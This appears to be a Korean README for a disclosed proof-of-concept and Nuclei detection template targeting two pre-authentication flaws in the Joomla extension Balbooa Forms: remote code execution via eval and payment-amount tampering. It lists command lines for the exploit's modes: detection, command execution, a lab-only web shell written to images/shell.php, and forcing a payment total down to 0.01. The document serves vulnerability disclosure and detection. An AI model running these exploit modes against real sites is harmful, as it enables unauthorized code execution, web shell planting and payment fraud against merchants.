
PoC 및 Balbooa Forms(Joomla)의 사전 인증 RCE 및 결제 변조를 위한 탐지 템플릿으로, Python 익스플로잇과 Nuclei 탐지 템플릿을 포함합니다.
Joomla용 Balbooa Forms(com_baforms)의 두 가지 사전 인증 취약점에 대한 PoC 및 탐지 템플릿으로, 2.4.3.2에서 수정되었습니다.
Lulztigre가 발견했으며, Joomla 보안 대응팀(JSST)을 통한 조정 공개로 2026-08-19에 게시되었습니다. 전체 분석 문서: https://lulztigre.pw/posts/balbooa-forms-penny-rce-67363-67364.html
| 파일 | 용도 |
|---|
balbooa_forms_poc.py | Python PoC, 표준 라이브러리만 사용, 두 CVE 모두 포함 |
CVE-2026-67364.yaml | Nuclei 템플릿, eval RCE의 비파괴적 탐지 |
의존성 없음(Python 3.8+). rce 및 detect 모드는 파일을 쓰지 않으며 실제 결제를 발생시키지 않습니다. shell 및 pay는 선택 사항이며 실험실 사용을 위한 것입니다.
# 1. 취약한 (form-id, submit-btn) 쌍 찾기. 비파괴적: 각 프로브는 에코 마커 페이로드가 포함된
# 익명 제출 1회입니다.
python3 balbooa_forms_poc.py http://target detect --form-max 3 --btn-max 10
# 2. 명령 실행 증명. 출력은 HTTP 응답으로 반환되며, 영속성이 없습니다.
python3 balbooa_forms_poc.py http://target rce --form 1 --btn 7 --cmd id
# 3. 일반적인 웹셸 증명(실험실 전용 - images/shell.php 파일 작성)
python3 balbooa_forms_poc.py http://target shell --form 1 --btn 7
# 4. 결제 금액 변조(실험실 전용 - 실제 결제 시도 발생, --authorize 필요)
python3 balbooa_forms_poc.py http://target pay --authorize --total 0.01
종료 코드 0 = 취약/악용됨, 1 = 정상 또는 실패, 2 = 사용법 오류.
참고 사항:
[URL parameter = X]를 참조하는 사용자 정의 PHP
핸들러가 있는 제출 버튼과 버튼에 reCAPTCHA가 없어야 합니다.--insecure는 자체 서명 인증서가 있는 HTTPS 대상에 대한 TLS 검증을 건너뜁니다.탐지만 수행: 익명 CSRF 토큰을 추출한 다음 에코 마커 페이로드로 작은 form/btn 범위를 스캔하고 응답에서 마커를 매칭합니다. 파일을 쓰지 않으며 실제 결제를 발생시키지 않습니다.
nuclei -t CVE-2026-67364.yaml -u http://target -v
nuclei v3.11.1(Windows + Linux)에서 검증됨: 토큰 추출, 30쌍 스캔
(form-id 1..3 x submit-btn 1..10, clusterbomb), 취약한 쌍에서 1건의 critical 매칭.
오프라인 환경에서는 -duc를 추가하여 업데이트 확인을 건너뜁니다. 스캔 범위는 의도적으로 작게
설정되어 있습니다. 대상에 더 많은 양식이 있는 경우 페이로드 범위를 늘리세요. 결제 변조(CVE-2026-67363)는
nuclei에서 의도적으로 자동화되지 않았습니다: 각 프로브는 판매자 게이트웨이에 대한 실제 결제 시도이기 때문입니다.
테스트 권한이 있는 시스템에만 사용하세요.